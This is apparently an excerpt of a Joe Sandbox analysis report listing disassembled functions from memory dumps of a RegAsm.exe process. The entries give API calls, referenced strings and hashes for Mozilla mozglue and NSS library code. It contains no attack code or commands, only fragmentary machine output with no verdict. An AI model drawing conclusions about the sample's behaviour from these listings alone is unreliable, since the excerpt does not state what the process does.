Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: a3023be525dbb27a5077b325557ace7afefd3fd2d67670413d356b77feedd022
Instruction ID: 04773498a4c898455eb2aa2b2e5b4cf7aa5b0eab89dd300dffeadb8a8900165a
Opcode Fuzzy Hash: a3023be525dbb27a5077b325557ace7afefd3fd2d67670413d356b77feedd022
Instruction Fuzzy Hash: 4B41C871F0121DDFDF04DFA9D890ADEB7B5EF88314F14812AE416A7704EB35A8498B90

Uniqueness

Uniqueness Score: -1.00%

Function 6CD38EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08ccd68fdef3e47495dbecca367f27739dc45bb72c4d4f8ca045684a135bc1f
Instruction ID: 9bba2cc2c8f881e43e47d19f6ad9a375d95f771c8efd4395dd2289841dab9e7e
Opcode Fuzzy Hash: a08ccd68fdef3e47495dbecca367f27739dc45bb72c4d4f8ca045684a135bc1f
Instruction Fuzzy Hash: 5D11B272A012258FD704CF25DC8475AB3B5BF42318F09526BD809CFAA1C776D886C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE10C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec995aacfae3d5712524703b96e33140883100312c1f118a833b4f38feea145
Instruction ID: f9daf225739eefd725d01df50926041cd1aada8e1ff3aadda7f578b77c2190b3
Opcode Fuzzy Hash: 0ec995aacfae3d5712524703b96e33140883100312c1f118a833b4f38feea145
Instruction Fuzzy Hash: A51194757083459FDB00DF19D8806AA77B5FF85368F248169D8198BB01DB71E826CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE10D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 3e4dbd4fc0e52f0c156ada53c03a124baf86c168202f83e133035821de6b528e
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: B6E06D3A21A054A7DB148E09C451AA97369DF82619FB4807ECC5A9BE01D633F8638781

Uniqueness

Uniqueness Score: -1.00%

Function 6CC255F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6CBFE1A5), ref: 6CC25606
LoadLibraryW.KERNEL32(gdi32,?,6CBFE1A5), ref: 6CC2560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CC25633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CC2563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CC2566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CC2567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CC25696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CC256B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CC256CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CC256E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CC256FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CC25716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CC2572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CC25748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CC25761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CC2577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CC25793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CC257A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CC257BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CC257D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CC257EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CC257FF

Strings

CreateSolidBrush, xrefs: 6CC257E4
user32, xrefs: 6CC25601
GetDpiForWindow, xrefs: 6CC25690
GetSystemMetricsForDpi, xrefs: 6CC25677
RegisterClassW, xrefs: 6CC256AC
LoadIconW, xrefs: 6CC2575B
DeleteObject, xrefs: 6CC257F9
MonitorFromWindow, xrefs: 6CC2578D
GetWindowDC, xrefs: 6CC25710
gdi32, xrefs: 6CC2560A
GetThreadDpiAwarenessContext, xrefs: 6CC2562D
CreateWindowExW, xrefs: 6CC256C5
ReleaseDC, xrefs: 6CC25742
AreDpiAwarenessContextsEqual, xrefs: 6CC25637
SetWindowLongPtrW, xrefs: 6CC257B7
LoadCursorW, xrefs: 6CC25774
EnableNonClientDpiScaling, xrefs: 6CC25666
GetMonitorInfoW, xrefs: 6CC257A2
ShowWindow, xrefs: 6CC256DE
SetWindowPos, xrefs: 6CC256F7
FillRect, xrefs: 6CC25729
StretchDIBits, xrefs: 6CC257CC

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: e0193448f15313147f543e366a583aad9533c3e1738acb449978aaadfeaff11d
Instruction ID: f397b93221fea3df2be800e2f1f55d776faf0b01c2bd3ede1229205ea510105c
Opcode Fuzzy Hash: e0193448f15313147f543e366a583aad9533c3e1738acb449978aaadfeaff11d
Instruction Fuzzy Hash: 62510070A51713AFEB01AF3D8D54D2B3AF8EB46249750D429E955E2A56FBB8CC00CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CBD582D), ref: 6CC0CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CBD582D), ref: 6CC0CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CC3FE98,?,?,?,?,?,6CBD582D), ref: 6CC0CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CBD582D), ref: 6CC0CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CBD582D), ref: 6CC0CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CBD582D), ref: 6CC0CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBD582D), ref: 6CC0CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CC0CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CC0CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CC0CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CC0CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CC0CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CC0CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CC0CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CC0CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CC0CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CC0CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CC0CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CC0CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CC0CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CC0CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CC0CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CC0CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CC0CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CC0CE8A

Strings

default, xrefs: 6CC0CC21
cpuallthreads, xrefs: 6CC0CE16
fileio, xrefs: 6CC0CC92
screenshots, xrefs: 6CC0CCD4
ipcmessages, xrefs: 6CC0CDBE
nostacksampling, xrefs: 6CC0CD7C
stackwalk, xrefs: 6CC0CCF8
seqstyle, xrefs: 6CC0CCE6
markersallthreads, xrefs: 6CC0CE42
fileioall, xrefs: 6CC0CCA8
leaf, xrefs: 6CC0CC66
processcpu, xrefs: 6CC0CE6E
mainthreadio, xrefs: 6CC0CC7C
preferencereads, xrefs: 6CC0CD92
audiocallbacktracing, xrefs: 6CC0CDD4
java, xrefs: 6CC0CC37
unregisteredthreads, xrefs: 6CC0CE58
power, xrefs: 6CC0CE84
Unrecognized feature "%s"., xrefs: 6CC0CEA0
samplingallthreads, xrefs: 6CC0CE2C
jsallocations, xrefs: 6CC0CD0E
nativeallocations, xrefs: 6CC0CDA8
noiostacks, xrefs: 6CC0CCBE
notimerresolutionchange, xrefs: 6CC0CE00

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 4699caa7cfaabc3da7f679ece4472a7192f6dab0daae9f22350f992ae312d03a
Instruction ID: db8bb138fdbba712f7c8cdeeccb6ed2e49eba36a0ce5d6c6f58fdbd850cf53ca
Opcode Fuzzy Hash: 4699caa7cfaabc3da7f679ece4472a7192f6dab0daae9f22350f992ae312d03a
Instruction Fuzzy Hash: 0851A6D2B4533552FA0031167D10BEE1449FF6324AF10957AEE2EA5E80FB07A61AC6B7

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CBD4801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBD4817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBD482D
__Init_thread_footer.LIBCMT ref: 6CBD484A

Part of subcall function 6CBFAB3F: EnterCriticalSection.KERNEL32(6CC4E370,?,?,6CBC3527,6CC4F6CC,?,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB49
Part of subcall function 6CBFAB3F: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC3527,6CC4F6CC,?,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFAB7C

GetCurrentThreadId.KERNEL32 ref: 6CBD485F
GetCurrentThreadId.KERNEL32 ref: 6CBD487E
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CBD488B
free.MOZGLUE(?), ref: 6CBD493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBD4956
free.MOZGLUE(00000000), ref: 6CBD4960
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CBD499A

Part of subcall function 6CBFAB89: EnterCriticalSection.KERNEL32(6CC4E370,?,?,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB94
Part of subcall function 6CBFAB89: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFABD1

free.MOZGLUE(?), ref: 6CBD49C6
free.MOZGLUE(?), ref: 6CBD49E9

Part of subcall function 6CBE5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBE5EDB
Part of subcall function 6CBE5E90: memset.VCRUNTIME140(6CC27765,000000E5,55CCCCCC), ref: 6CBE5F27
Part of subcall function 6CBE5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBE5FB2

Strings

[I %d/%d] profiler_shutdown, xrefs: 6CBD4A06
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CBD4812
MOZ_PROFILER_SHUTDOWN, xrefs: 6CBD4A42
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CBD47FC
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CBD4828

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 1c86faf4c40cb7a93bdd2d4b0eb879eb0a676cc315313743f4e9f8573970b4f5
Instruction ID: 197f5da0ef6971fbd0e8736cb0de3bc7a656d67e621c76486902249343990b9e
Opcode Fuzzy Hash: 1c86faf4c40cb7a93bdd2d4b0eb879eb0a676cc315313743f4e9f8573970b4f5
Instruction Fuzzy Hash: EE81F070A001808FDB10AF68C88475E3775EF4232DF168669E91697F41EB31F859CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6CE16E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCCCA30: EnterCriticalSection.KERNEL32(?,?,?,6CD2F9C9,?,6CD2F4DA,6CD2F9C9,?,?,6CCF369A), ref: 6CCCCA7A
Part of subcall function 6CCCCA30: LeaveCriticalSection.KERNEL32(?), ref: 6CCCCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CCDBE66), ref: 6CE16E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CCDBE66), ref: 6CE16E98
sqlite3_snprintf.NSS3(?,00000000,6CE7AAF9,?,?,?,?,?,?,6CCDBE66), ref: 6CE16EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CCDBE66), ref: 6CE16ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CCDBE66), ref: 6CE16EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE16F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE16F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE16F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CCDBE66), ref: 6CE16FA6
sqlite3_snprintf.NSS3(?,00000000,6CE7AAF9,00000000,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE16FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE16FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE16FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE17014
sqlite3_free.NSS3(00000000,?,?,?,?,6CCDBE66), ref: 6CE1701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CCDBE66), ref: 6CE17030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE1705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CCDBE66), ref: 6CE17079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE17097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CCDBE66), ref: 6CE170A0

Strings

winGetTempname5, xrefs: 6CE17071
mz_etilqs_, xrefs: 6CE16F18
winGetTempname2, xrefs: 6CE170C4
winGetTempname4, xrefs: 6CE17046
winGetTempname1, xrefs: 6CE1708F
Pl, xrefs: 6CE170A8

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Pl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-748229751
Opcode ID: e46fdb6c611135d931c349069f1487ea95167c171b8aa47f4158ab1d7cf9f25d
Instruction ID: a091479524efd37a328fccfbd8d3145c200163a704c33d386223865592a323fe
Opcode Fuzzy Hash: e46fdb6c611135d931c349069f1487ea95167c171b8aa47f4158ab1d7cf9f25d
Instruction Fuzzy Hash: 215148B1B086115BE31097209C55BBB367A9B9271CF38463CE81597FC1FB25992EC2E3

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBD4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CBD44B2,6CC4E21C,6CC4F7F8), ref: 6CBD473E
Part of subcall function 6CBD4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CBD474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CBD44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CBD44D2
InitOnceExecuteOnce.KERNEL32(6CC4F80C,6CBCF240,?,?), ref: 6CBD451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CBD455C
LoadLibraryW.KERNEL32(?), ref: 6CBD4592
InitializeCriticalSection.KERNEL32(6CC4F770), ref: 6CBD45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6CBD45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6CBD45BB
InitOnceExecuteOnce.KERNEL32(6CC4F818,6CBCF240,?,?), ref: 6CBD4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CBD4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6CBD4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6CBD466D
VerSetConditionMask.NTDLL ref: 6CBD469F
VerSetConditionMask.NTDLL ref: 6CBD46AB
VerSetConditionMask.NTDLL ref: 6CBD46B2
VerSetConditionMask.NTDLL ref: 6CBD46B9
VerSetConditionMask.NTDLL ref: 6CBD46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CBD46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6CBD46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CBD46FD

Strings

user32.dll, xrefs: 6CBD4557, 6CBD463F
WRusr.dll, xrefs: 6CBD44B5
kernel32.dll, xrefs: 6CBD44CD
l, xrefs: 6CBD4578
NativeNtBlockSet_Write, xrefs: 6CBD46F7

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: e0141a0f3e06197945718cc4a11af588a23cfc9fffd1b05f7b228d85f553da90
Instruction ID: 848a8feb9d7878d72f8ff07fbdaa3838b59ebba95aa495f3bd028b310ed448f1
Opcode Fuzzy Hash: e0141a0f3e06197945718cc4a11af588a23cfc9fffd1b05f7b228d85f553da90
Instruction Fuzzy Hash: C761F6B0A04384AFEB10EF60CC49B99BBB8EF4730CF15C598E5089B641E775A945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6CD78E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6CD78E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD78EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD78EB3

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD78EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CD78EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CD78F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD78F29
PR_LogPrint.NSS3(?,00000000), ref: 6CD78F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CD78F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD78F80
PR_LogPrint.NSS3(?,00000000), ref: 6CD78F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CD78FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CD78FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CD79047

Strings

pMechanism = 0x%p, xrefs: 6CD78EE0
(CK_INVALID_HANDLE), xrefs: 6CD78EAC, 6CD78F1F, 6CD78F79
hSession = 0x%x, xrefs: 6CD78E8E, 6CD78E9E
pWrappedKey = 0x%p, xrefs: 6CD78FAD
C_WrapKey, xrefs: 6CD78E71
pulWrappedKeyLen = 0x%p, xrefs: 6CD78FC8
hKey = 0x%x, xrefs: 6CD78F5B, 6CD78F6B
hWrappingKey = 0x%x, xrefs: 6CD78F01, 6CD78F11
nl, xrefs: 6CD78FEC, 6CD79023
*pulWrappedKeyLen = 0x%x, xrefs: 6CD79042

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

